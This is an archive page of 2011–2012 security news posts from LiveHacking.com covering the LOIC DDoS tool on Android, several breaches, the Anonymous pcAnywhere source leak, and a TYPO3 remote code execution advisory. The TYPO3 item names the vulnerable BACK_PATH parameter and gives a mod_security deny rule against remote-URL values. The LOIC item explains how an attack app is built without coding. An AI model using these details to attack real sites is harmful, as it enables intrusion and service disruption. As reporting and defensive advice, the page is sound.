February 22, 2012

You are here: Home / Archives for Attacks

DDoS Attack Tool Comes to Android

February 21, 2012 By Leave a Comment

(LiveHacking.Com) – McAfree has reported that the common Low Orbit Ion Cannon (LOIC) denial of service (DoS) tool has been ported to Android. ‘Ported’ might be too strong of a word as this mobile device version is in fact a wrapper around the Javascript version. Nonetheless, this is an interesting advancement in the ubiquity of hacking tools.

Hacktivism (hacking as political or social protest) is becoming increasingly popular with groups like Anonymous using hacking tools to launch distributed denial of service attacks on organizations all over the world. LOIC, one such tool used by the hackers, was originally developed to stress-test websites, however it has now been effectively used by hackers to take websites offline by sending a flood of TCP/UDP packets which overwhelms the server and makes it inaccessible.

Originally written in C#, LOIC inspired the creation of an independent JavaScript version. This version allowed a DoS attacked to be launched from a web browser. In conjunction with PasteHTML, which allows anyone to post HTML onto the web anonymously (no pun intended), and the free AppsGeyser service, which converts web pages into an App, an Android App has been created which encapsulates the Javascript version of LOIC in an Android app. Specifically, the version spotted by McAfee, targets the Argentinian government, but theoretically an Android app can be created to attack any web site. When the app is launched a WebView component is used to run the JavaScript that sends 1,000 HTTP requests with the message “We are LEGION!” as one of the parameters.

“Creating Android applications that perform DoS attacks is now easy: It requires only the URL of an active web LOIC–and zero programming skills–thanks to automated online tools,” wrote Carlos Castillo for McAfee.

Filed Under: Android, Attack, Attacks Tagged With: , , , , ,

Dutch ISP KPN Security Breach

February 13, 2012 By Leave a Comment

(LiveHacking.Com) – One of the largest ISPs in The Netherlands has shut down its email services after a security breach where hackers leaked the credentials and personal information of more than 500 of its customers.

KPN discovered the breach at the end of January but after consulting with the Dutch government and law enforcement agencies decided not to go public with the details. Once KPN discovered that account details were being posted online (at PasteBin) then it decided to suspend its email services as a precautionary measure. During Saturday email services resumed and KPN sent customers information on how to reset their password.

KPN has over two million customers and it is unclear if the hackers got access to information about all of these account or just the 500 posted online.

Filed Under: Attack, Attacks, News, Security Tagged With: , ,

Hackers Strike at iPhone Maker Foxconn

February 10, 2012 By

(LiveHacking.Com) – A hacking group calling themselves SwaggSec has launched an attack against Foxconn, the Chinese company who makes iPhones for Apple, and posted data it stole from their servers on The Pirate Bay. According to the blog 9to5Mac the the data contained usernames and passwords for company employees which they were able to verify before access to the servers was shut down.

The hackers bragged about their attack on Pastebin where they cited “inhuman conditions the workers experience” as one of the motivations for the hack. They also noted that “Foxconn did have an appropriate firewall” but they hackers were able to “bypass it almost flawlessly.”

It appears that the authorization credentials for Foxconn’s chief executive Terry Gou were among those included in the posted data but the password is encrypted.

Filed Under: Attack, Attacks, News, Security Tagged With: ,

Symantec Working with Unnamed Law Enforcement Agency

February 7, 2012 By

(LiveHacking.Com) – Following my blog post about Anonymous releasing the source code for pcAnywhere, Symantec has contacted us here at LiveHacking.com with further details of the events leading up to the uploading of the source code. Symantec are underlining the following things:

  1. Symantec did NOT offer a bribe to Anonymous. Anonymous tried to extort Symantec for money to withold posting of additional source code. (As a point of clarification – I didn’t say that Symantec offered a bribe and have never inferred it, the original blog post said that the hacker YamaTough asked for $50,000 not to release the source code).
  2. The e-mail string posted on Pastebin by Anonymous was actually between them and a fake e-mail address set up by law enforcement.
  3. Once Symantec saw that it was a clear cut case of extortion, they contacted law enforcement and turned the investigation over to them. All subsequent communications were actually between Anonymous and law enforcement agents – not Symantec.

“The communications with the person(s) attempting to extort the payment from Symantec were part of the law enforcement investigation.  Given that the investigation is still ongoing, we are not going to disclose the law enforcement agencies involved,” said Cris Paden of Symantec in his email to us.

Filed Under: Attack, Attacks, News, Security Tagged With: , , ,

Anonymous Releases Source Code for pcAnywhere [Updated]

February 7, 2012 By

Update: Symantec has contacted us here at LiveHacking.com with the following correction: The e-mail string posted on Pastebin by Anonymous was actually between them and a fake e-mail address set up by law enforcement. For more details see Symantec Working with Unnamed Law Enforcement Agency

(LiveHacking.Com) – The hacking group Anonymous has tweeted that it has released the source code of Symantec’s pcAnywhere on The Pirate Bay. The release of the software seems to have come after a set of emails between Symantec a  law enforcement agency (masquerading as Symantec) and the hacker YamaTough. The hacker tried to exhort money from Symantec when he asked for $50,000 not to release the source code. According to the email exchange the negotaions ended when the hacker gave Symantec the law enforcement agency (masquerading as Symantec) a 10 minute utlimatum: “we give you 10 minutes to decide which way you go after that two of your codes fly to the moon PCAnywhere and Norton Antivirus.” To which Symantec the law enforcement agency (masquerading as Symantec) replied “We can’t make a decision in ten minutes.  We need more time.”

It seems that this then prompted the release of the source code. We spoke with a security expert who has downloaded the archive of the source code and his initial impression is that the release is genuine. According to our expert (who wishes to remain unnamed due to fears of possible reprisals by Symantec) the archive contains the following directries:


AccessServer
CE_Remote
CM
Development
InfoDev
Java_Remote
LU_Patches
Mac_ThinHost
RAPS
SCA
Shared
Tivoli
Unix_Host
pcA-NG
pcAnywhereExpress
pca32
pca_LiveState_2.0
pca_ONiCommand_3.0
r12.0-M1

The Development directory contains documentation including a document called “Programming Style Guide” which is marked as “Symantec Confidential” and pertains to “pcAnywhere / Decomposer / Packager”. The “pca32″ project seems to contain source code with valid Microsoft Visual Studio project files.

According to ComputerWorld there is no official word yet from Symantec as “it happened so recently that we’re still in the process of analyzing and won’t be able to confirm until the morning.”

Filed Under: Attack, Attacks, News, Security Tagged With: , , ,

US-Cert Warns of On-going Denial-of-Service Attacks by Anonymous

January 27, 2012 By

(LiveHacking.Com) – The United States Computer Emergency Readiness Team (US-CERT), the operational arm of the National Cyber Security Division (NCSD) at the Department of Homeland Security (DHS), has issued a warning about on-going distributed denial-of-service attacks against different government institutions both in the USA and in the EU. According to the reports, these attacks are being attributed to the hacker group Anonymous.

Recent attacks by the group include:

  • Several Polish government web sites, including those of the Prime Minister, the President and Parliament. A Polish branch of Anonymous has already claimed responsibility for the attacks.
  • The European parliament website came under cyber attack on Thursday.
  • The Irish Department for Justice website and the sites of several large financial institutions
  • Other targets in the last week have included Universal Music, the U.S. Department of Justice and the Recording Industry Association of America.
The attacks are motivate either by the recent shutdown of the Megaupload site or by the signing of the  international Anti-Counterfeiting Trade Agreement (ACTA).

US-CERT encourages users and administrators to do the following to reduce the risk associated with this and other malware campaigns:

Filed Under: Attack, Attacks Tagged With: , , ,

Zappos.com Hacked and Turns off Phones to Avoid Deluge of Calls from Customers

January 16, 2012 By

(LiveHacking.Com) – Online shoes and clothing retailer Zappos.com has suffered a security breach. During the attack the hacker managed to gain access to parts of Zappos’ internal network through one of its servers in Kentucky. Zappos however say that the secure databases with the credit details and other payment data was not accessed. On Sunday the company CEO Tony Hsieh sent an email to Zappos employees announcing the attack and previewed an email that will be sent to its customers.

We are writing to let you know that there may have been illegal and unauthorized access to some of your customer account information on Zappos.com, including one or more of the following: your name, e-mail address, billing and shipping addresses, phone number, the last four digits of your credit card number (the standard information you find on receipts), and/or your cryptographically scrambled password (but not your actual password).

The email then goes on to reassure customers that the secure database that stores their critical credit card and other payment data was NOT affected or accessed. It then asks customers to create new passwords. Due to the huge number of affected people, somewhere in the region of 20 million, Zappos are shutting down their customer support phone lines and are focusing on answering questions by email.

The recent security breach at Stratfor allowed security researchers to break over 80,000 of the nearly 1 millions passwords, which had been posted online, in just 5 hours. This is due to advances in cracking hashed passwords using the processing power of modern graphic cards. Although the Zappos passwords have been reset, it is important that users change their password on any other website where they inadvertently used the same password.

Filed Under: Attack, Attacks, News, Security Tagged With:

Global Intelligence Company Hit by Anonymous. Or Was it?

December 27, 2011 By

(LiveHacking.Com) – The hacking group known as Anonymous says it has stolen emails, passwords and credit card information from the Texas based security think-tank Strategic Forecasting, Inc. According to the BBC, an alleged member of Anonymous posted an online message, claiming that the group had used Stratfor clients’ credit card details to make “over a million dollars” in donations to different charities.

Stratfor’s website was defaced with the message “merry lulzxmas! are you ready for a week of mayhem? H0h0h0h0h0.” In response Stratfor took down its website and suspended email processing. The company, which provides independent analysis of international affairs and security threats, sent an e-mail Sunday to subscribers:

“On December 24th an unauthorized party disclosed personally identifiable information and related credit card data of some of our members. We have reason to believe that your personal and credit card data could have been included in the information that was illegally obtained and disclosed.”

However in a bizarre twist another posting appeared from Anonymous saying “hackers claiming to be Anonymous have distorted this truth in order to further their hidden agenda”

“The leaked client list represents subscribers to a daily publication which is the primary service of Stratfor. Stratfor analysts are widely considered to be extremely unbiased. Anonymous does not attack media sources” said Anonymous via an emergency Christmas Anonymous press release.

Filed Under: Attack, Attacks, News Tagged With: , , ,

Facebook Scams with Chrome and FireFox Plugins

December 23, 2011 By

Picture Source: Websense security labs

(LiveHacking.Com) – Security researchers at Websense® have discovered new Facebook scams.

According to the report published by Websense®, the attacker is utilizing social engineering tricks such as engaging video or offers of a free voucher to attract the victims to its scam pages. Then, the victims will be asked to install a browser plugin. When the plugin is installed, it utilizes a malicious script and the Facebook API to post the scam to the victim’s friends’ pages.

According to the Websense® researchers, at the moment, only Chrome and Firefox plugins are being used.

More information is available at Websense® Security Blog.

Filed Under: Attacks, Facebook Tagged With: , , ,

Critical Vulnerability is TYPO3-Core; Remote Code Execution

December 19, 2011 By

(LiveHacking.Com) – The TYPO3 development team has issued a warning about a critical vulnerability in the TYPO3 content management system.

According to TYPO3 security bulletins, a crafted request to a vulnerable TYPO3 installation will allow an attacker to load PHP code from an external source and to execute it on the TYPO3 installation. The security issue is due to insufficient validation of the AbstractController.php file’s BACK_PATH parameter that leads to remote code execution.

With reference to the TYPO3 security advisory, a vulnerable system will meet all the the following conditions:

  1. TYPO3 version 4.5.0 up to 4.5.8, 4.6.0 or 4.6.1 (+ development releases of 4.7 branch).
  2. The following PHP configuration variables set to “on”: register_globals (“off” by default, advised to be “off” in TYPO3SecurityGuide), allow_url_include (“off” by default) and allow_url_fopen (“on” by default)

The following solutions have been advised by the TYPO3 security advisory:

  1. Update to the TYPO3 version 4.5.9 or 4.6.2 that fixes the problem described.
  2. Set at least one of following PHP configuration variables to “off”: register_globals, allow_url_include and allow_url_fopen.
  3. Apply the securitypatch.
  4. Set up a mod_security rule: SecRule ARGS:BACK_PATH “^(https?|ftp)” “deny”.

Please view the TYPO3 security advisory for more information.

Filed Under: Attack, Attacks, TYPO3, Vulnerability Tagged With: , , ,
« Older Posts